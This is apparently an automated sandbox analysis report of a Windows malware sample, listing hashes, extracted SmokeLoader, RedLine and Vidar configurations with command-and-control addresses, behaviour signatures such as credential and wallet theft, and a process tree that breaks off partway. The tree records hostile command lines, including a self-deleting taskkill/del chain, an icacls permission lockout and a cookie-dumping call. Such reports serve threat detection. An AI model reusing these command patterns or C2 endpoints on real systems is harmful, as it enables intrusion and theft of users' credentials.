Resubmissions

12-07-2021 16:55

210712-cvz622xsbj 10

10-07-2021 13:25

210710-pdfh7kft96 10

09-07-2021 23:00

210709-hewxkm1xlj 10

09-07-2021 16:08

210709-5ql27kyjqa 10

09-07-2021 14:08

210709-pt977a4bhe 10

08-07-2021 22:09

210708-3ypfnj5j7x 10

08-07-2021 13:30

210708-4hsk7y9f2x 10

08-07-2021 12:14

210708-8t5f9z9egj 10

Analysis

  • max time kernel
    138s
  • max time network
    212s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    08-07-2021 12:14

General

  • Target

    toolspab2 (20).exe

  • Size

    315KB

  • MD5

    585c257e0b345b762e7cdc407d8f9da2

  • SHA1

    ffee403d97b76c3460fc166b9d5ce1205cd216a5

  • SHA256

    4a0ecbcf9b54ed1c9654eb9ee214a797f48c980c6d03a261f62fa9671a2733d6

  • SHA512

    14d39a6cd1c6d912cae7c35e2a98affcd5a9c1df6b947c42de65344e08d34912b09ccac83f9d8c3213b4e3d555769801e8218cb3f4b970d1d08606ee5a454ba8

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

Seryi

C2

185.203.243.131:27365

Extracted

Family

redline

Botnet

agressor

C2

65.21.122.45:8085

Extracted

Family

vidar

Version

39.4

Botnet

824

C2

https://sergeevih43.tumblr.com

Attributes
  • profile_id

    824

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar Stealer 3 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 31 IoCs
  • Modifies Windows Firewall 1 TTPs
  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 20 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 30 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies registry class 2 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\toolspab2 (20).exe
    "C:\Users\Admin\AppData\Local\Temp\toolspab2 (20).exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3176
    • C:\Users\Admin\AppData\Local\Temp\toolspab2 (20).exe
      "C:\Users\Admin\AppData\Local\Temp\toolspab2 (20).exe"
      2⤵
      • Loads dropped DLL
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:948
  • C:\Users\Admin\AppData\Local\Temp\C98F.exe
    C:\Users\Admin\AppData\Local\Temp\C98F.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetWindowsHookEx
    PID:4080
  • C:\Users\Admin\AppData\Local\Temp\CBD2.exe
    C:\Users\Admin\AppData\Local\Temp\CBD2.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetWindowsHookEx
    PID:1372
    • C:\Users\Admin\AppData\Local\Temp\is-G75UR.tmp\EA7D.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-G75UR.tmp\EA7D.tmp" /SL5="$201E8,188175,104448,C:\Users\Admin\AppData\Local\Temp\EA7D.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      PID:2088
      • C:\Users\Admin\AppData\Local\Temp\is-1AVB9.tmp\134 Vaporeondè_éçè_)))_.exe
        "C:\Users\Admin\AppData\Local\Temp\is-1AVB9.tmp\134 Vaporeondè_éçè_)))_.exe" /S /UID=rec7
        3⤵
          PID:524
          • C:\Program Files\Google\YMGDUMXUVI\irecord.exe
            "C:\Program Files\Google\YMGDUMXUVI\irecord.exe" /VERYSILENT
            4⤵
            • Executes dropped EXE
            PID:4124
            • C:\Users\Admin\AppData\Local\Temp\is-9EENI.tmp\irecord.tmp
              "C:\Users\Admin\AppData\Local\Temp\is-9EENI.tmp\irecord.tmp" /SL5="$60234,5808768,66560,C:\Program Files\Google\YMGDUMXUVI\irecord.exe" /VERYSILENT
              5⤵
              • Executes dropped EXE
              • Drops file in Program Files directory
              • Suspicious use of FindShellTrayWindow
              PID:4228
              • C:\Program Files (x86)\i-record\I-Record.exe
                "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:4392
          • C:\Users\Admin\AppData\Local\Temp\ec-d0362-e55-6639c-06d7bdbd978af\Jupucadarae.exe
            "C:\Users\Admin\AppData\Local\Temp\ec-d0362-e55-6639c-06d7bdbd978af\Jupucadarae.exe"
            4⤵
            • Executes dropped EXE
            PID:4176
          • C:\Users\Admin\AppData\Local\Temp\ba-4d5e5-20b-f6e9f-56d8739171a97\Sisyzhaboku.exe
            "C:\Users\Admin\AppData\Local\Temp\ba-4d5e5-20b-f6e9f-56d8739171a97\Sisyzhaboku.exe"
            4⤵
            • Executes dropped EXE
            PID:4248
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xb2kpa2i.iyc\GcleanerEU.exe /eufive & exit
              5⤵
                PID:5092
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\exd1fsur.0bn\installer.exe /qn CAMPAIGN="654" & exit
                5⤵
                  PID:1224
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\00apmjih.an3\Setup3310.exe /Verysilent /subid=623 & exit
                  5⤵
                    PID:4740
                    • C:\Users\Admin\AppData\Local\Temp\00apmjih.an3\Setup3310.exe
                      C:\Users\Admin\AppData\Local\Temp\00apmjih.an3\Setup3310.exe /Verysilent /subid=623
                      6⤵
                        PID:5084
                        • C:\Users\Admin\AppData\Local\Temp\is-U75FT.tmp\Setup3310.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-U75FT.tmp\Setup3310.tmp" /SL5="$202A4,138429,56832,C:\Users\Admin\AppData\Local\Temp\00apmjih.an3\Setup3310.exe" /Verysilent /subid=623
                          7⤵
                            PID:804
                            • C:\Users\Admin\AppData\Local\Temp\is-5R21S.tmp\Setup.exe
                              "C:\Users\Admin\AppData\Local\Temp\is-5R21S.tmp\Setup.exe" /Verysilent
                              8⤵
                                PID:5160
                                • C:\Program Files (x86)\Data Finder\Versium Research\updatetes.exe
                                  "C:\Program Files (x86)\Data Finder\Versium Research\updatetes.exe"
                                  9⤵
                                    PID:5540
                                  • C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe
                                    "C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe"
                                    9⤵
                                      PID:5532
                                      • C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe
                                        "C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe" -a
                                        10⤵
                                          PID:6044
                                      • C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe
                                        "C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"
                                        9⤵
                                          PID:5524
                                          • C:\Users\Admin\AppData\Local\Temp\is-8243O.tmp\LabPicV3.tmp
                                            "C:\Users\Admin\AppData\Local\Temp\is-8243O.tmp\LabPicV3.tmp" /SL5="$203FE,506127,422400,C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"
                                            10⤵
                                              PID:5680
                                              • C:\Users\Admin\AppData\Local\Temp\is-7DIBR.tmp\12(((((.exe
                                                "C:\Users\Admin\AppData\Local\Temp\is-7DIBR.tmp\12(((((.exe" /S /UID=lab214
                                                11⤵
                                                  PID:5212
                                                  • C:\Program Files\Java\NQGESGIDLA\prolab.exe
                                                    "C:\Program Files\Java\NQGESGIDLA\prolab.exe" /VERYSILENT
                                                    12⤵
                                                      PID:6904
                                                      • C:\Users\Admin\AppData\Local\Temp\is-AS9NL.tmp\prolab.tmp
                                                        "C:\Users\Admin\AppData\Local\Temp\is-AS9NL.tmp\prolab.tmp" /SL5="$503A4,575243,216576,C:\Program Files\Java\NQGESGIDLA\prolab.exe" /VERYSILENT
                                                        13⤵
                                                          PID:7008
                                                      • C:\Users\Admin\AppData\Local\Temp\5c-9544f-221-84f81-a101c91a7eb84\Difehohito.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\5c-9544f-221-84f81-a101c91a7eb84\Difehohito.exe"
                                                        12⤵
                                                          PID:7024
                                                          • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                            dw20.exe -x -s 2236
                                                            13⤵
                                                              PID:6780
                                                          • C:\Users\Admin\AppData\Local\Temp\c2-5f11c-0f9-4cdb4-995eb9681cff1\Kulyshimoshae.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\c2-5f11c-0f9-4cdb4-995eb9681cff1\Kulyshimoshae.exe"
                                                            12⤵
                                                              PID:6176
                                                      • C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe
                                                        "C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"
                                                        9⤵
                                                          PID:5516
                                                          • C:\Users\Admin\AppData\Local\Temp\is-U0PH7.tmp\lylal220.tmp
                                                            "C:\Users\Admin\AppData\Local\Temp\is-U0PH7.tmp\lylal220.tmp" /SL5="$3037C,172303,88576,C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"
                                                            10⤵
                                                              PID:5672
                                                              • C:\Users\Admin\AppData\Local\Temp\is-4D5J3.tmp\èeèrgegdè_éçè_)))_.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\is-4D5J3.tmp\èeèrgegdè_éçè_)))_.exe" /S /UID=lylal220
                                                                11⤵
                                                                  PID:4572
                                                                  • C:\Program Files\Windows Security\INTBBWIRBF\irecord.exe
                                                                    "C:\Program Files\Windows Security\INTBBWIRBF\irecord.exe" /VERYSILENT
                                                                    12⤵
                                                                      PID:6976
                                                                      • C:\Users\Admin\AppData\Local\Temp\is-GSMH8.tmp\irecord.tmp
                                                                        "C:\Users\Admin\AppData\Local\Temp\is-GSMH8.tmp\irecord.tmp" /SL5="$403DC,5808768,66560,C:\Program Files\Windows Security\INTBBWIRBF\irecord.exe" /VERYSILENT
                                                                        13⤵
                                                                          PID:7044
                                                                          • C:\Program Files (x86)\i-record\I-Record.exe
                                                                            "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
                                                                            14⤵
                                                                              PID:4432
                                                                        • C:\Users\Admin\AppData\Local\Temp\50-b838e-4b3-30490-41a940cfb32b2\Waejubinaba.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\50-b838e-4b3-30490-41a940cfb32b2\Waejubinaba.exe"
                                                                          12⤵
                                                                            PID:7016
                                                                            • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                              dw20.exe -x -s 1960
                                                                              13⤵
                                                                                PID:5812
                                                                            • C:\Users\Admin\AppData\Local\Temp\5b-db9e3-5c6-94584-e5ccce577e79e\Nexaexesyvi.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\5b-db9e3-5c6-94584-e5ccce577e79e\Nexaexesyvi.exe"
                                                                              12⤵
                                                                                PID:4536
                                                                        • C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe
                                                                          "C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe"
                                                                          9⤵
                                                                            PID:5508
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-5PB35.tmp\MediaBurner.tmp
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-5PB35.tmp\MediaBurner.tmp" /SL5="$1041C,303887,220160,C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe"
                                                                              10⤵
                                                                                PID:5660
                                                                                • C:\Users\Admin\AppData\Local\Temp\is-6DE3J.tmp\_____________bob.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-6DE3J.tmp\_____________bob.exe" /S /UID=burnerch1
                                                                                  11⤵
                                                                                    PID:1692
                                                                                    • C:\Program Files\Microsoft Office\VAJXTDRNOM\ultramediaburner.exe
                                                                                      "C:\Program Files\Microsoft Office\VAJXTDRNOM\ultramediaburner.exe" /VERYSILENT
                                                                                      12⤵
                                                                                        PID:6676
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-R66RE.tmp\ultramediaburner.tmp
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-R66RE.tmp\ultramediaburner.tmp" /SL5="$4046C,281924,62464,C:\Program Files\Microsoft Office\VAJXTDRNOM\ultramediaburner.exe" /VERYSILENT
                                                                                          13⤵
                                                                                            PID:6728
                                                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                              "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                              14⤵
                                                                                                PID:6892
                                                                                          • C:\Users\Admin\AppData\Local\Temp\b6-e513a-54f-66ba6-8bd5614807e80\Vyrecilezha.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\b6-e513a-54f-66ba6-8bd5614807e80\Vyrecilezha.exe"
                                                                                            12⤵
                                                                                              PID:6736
                                                                                              • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                dw20.exe -x -s 1980
                                                                                                13⤵
                                                                                                  PID:3692
                                                                                              • C:\Users\Admin\AppData\Local\Temp\5e-1e605-561-4948d-3b4a749106748\Meqaefakego.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\5e-1e605-561-4948d-3b4a749106748\Meqaefakego.exe"
                                                                                                12⤵
                                                                                                  PID:6812
                                                                                          • C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe
                                                                                            "C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe"
                                                                                            9⤵
                                                                                              PID:5500
                                                                                              • C:\Users\Admin\AppData\Roaming\8951797.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\8951797.exe"
                                                                                                10⤵
                                                                                                  PID:5924
                                                                                                • C:\Users\Admin\AppData\Roaming\5776010.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\5776010.exe"
                                                                                                  10⤵
                                                                                                    PID:5748
                                                                                                  • C:\Users\Admin\AppData\Roaming\1091576.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\1091576.exe"
                                                                                                    10⤵
                                                                                                      PID:5772
                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                        11⤵
                                                                                                          PID:5960
                                                                                                    • C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe
                                                                                                      "C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe"
                                                                                                      9⤵
                                                                                                        PID:5492
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit
                                                                                                          10⤵
                                                                                                            PID:6424
                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                              taskkill /im RunWW.exe /f
                                                                                                              11⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:6788
                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                              timeout /t 6
                                                                                                              11⤵
                                                                                                              • Delays execution with timeout.exe
                                                                                                              PID:6088
                                                                                                        • C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe
                                                                                                          "C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe"
                                                                                                          9⤵
                                                                                                            PID:5484
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                              10⤵
                                                                                                                PID:5436
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                10⤵
                                                                                                                  PID:7124
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sf2cpjfa.f3k\google-game.exe & exit
                                                                                                        5⤵
                                                                                                          PID:3788
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\sf2cpjfa.f3k\google-game.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\sf2cpjfa.f3k\google-game.exe
                                                                                                            6⤵
                                                                                                              PID:872
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\sf2cpjfa.f3k\google-game.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\sf2cpjfa.f3k\google-game.exe" -a
                                                                                                                7⤵
                                                                                                                • Drops file in Drivers directory
                                                                                                                • Executes dropped EXE
                                                                                                                • Adds Run key to start application
                                                                                                                • Drops file in Program Files directory
                                                                                                                PID:524
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uwfevb3e.cor\GcleanerWW.exe /mixone & exit
                                                                                                            5⤵
                                                                                                              PID:4928
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j4r5a1n3.cy5\toolspab1.exe & exit
                                                                                                              5⤵
                                                                                                                PID:1812
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\j4r5a1n3.cy5\toolspab1.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\j4r5a1n3.cy5\toolspab1.exe
                                                                                                                  6⤵
                                                                                                                    PID:5408
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\j4r5a1n3.cy5\toolspab1.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\j4r5a1n3.cy5\toolspab1.exe
                                                                                                                      7⤵
                                                                                                                        PID:6396
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\agnhf3mh.0nb\SunLabsPlayer.exe /S & exit
                                                                                                                    5⤵
                                                                                                                      PID:4168
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\agnhf3mh.0nb\SunLabsPlayer.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\agnhf3mh.0nb\SunLabsPlayer.exe /S
                                                                                                                        6⤵
                                                                                                                          PID:6196
                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyB10E.tmp\tempfile.ps1"
                                                                                                                            7⤵
                                                                                                                              PID:7160
                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyB10E.tmp\tempfile.ps1"
                                                                                                                              7⤵
                                                                                                                                PID:5816
                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyB10E.tmp\tempfile.ps1"
                                                                                                                                7⤵
                                                                                                                                  PID:6484
                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyB10E.tmp\tempfile.ps1"
                                                                                                                                  7⤵
                                                                                                                                    PID:4796
                                                                                                                                  • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                                    "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                                    7⤵
                                                                                                                                      PID:5380
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\206C.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\206C.exe
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                          PID:2144
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\206C.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\206C.exe
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:2764
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\2464.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\2464.exe
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Loads dropped DLL
                                                                                                                          PID:2992
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\26B7.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\26B7.exe
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4036
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\2D21.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\2D21.exe
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:3176
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\32AF.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\32AF.exe
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:3400
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\364A.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\364A.exe
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Loads dropped DLL
                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                          PID:3988
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\3AC0.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\3AC0.exe
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:3056
                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                          1⤵
                                                                                                                            PID:700
                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                            C:\Windows\explorer.exe
                                                                                                                            1⤵
                                                                                                                              PID:4040
                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                              1⤵
                                                                                                                                PID:3692
                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                1⤵
                                                                                                                                  PID:2304
                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  1⤵
                                                                                                                                    PID:1928
                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                    1⤵
                                                                                                                                      PID:1760
                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      1⤵
                                                                                                                                        PID:3948
                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                        1⤵
                                                                                                                                          PID:2232
                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                          1⤵
                                                                                                                                            PID:684
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\C85B.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\C85B.exe
                                                                                                                                            1⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                            PID:3936
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\C85B.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\C85B.exe
                                                                                                                                              2⤵
                                                                                                                                                PID:1456
                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                  icacls "C:\Users\Admin\AppData\Local\c2a6190f-bb3c-43cf-b971-d6b8c5865d57" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                  3⤵
                                                                                                                                                  • Modifies file permissions
                                                                                                                                                  PID:3496
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\C85B.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\C85B.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                  PID:3712
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\C85B.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\C85B.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                    4⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:3828
                                                                                                                                                    • C:\Users\Admin\AppData\Local\588f5c43-a272-4f6a-b7ed-d6143f259a05\build2.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\588f5c43-a272-4f6a-b7ed-d6143f259a05\build2.exe"
                                                                                                                                                      5⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:4152
                                                                                                                                                      • C:\Users\Admin\AppData\Local\588f5c43-a272-4f6a-b7ed-d6143f259a05\build2.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\588f5c43-a272-4f6a-b7ed-d6143f259a05\build2.exe"
                                                                                                                                                        6⤵
                                                                                                                                                          PID:432
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 1196
                                                                                                                                                            7⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:4880
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\C937.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\C937.exe
                                                                                                                                                1⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                • Checks processor information in registry
                                                                                                                                                PID:2936
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
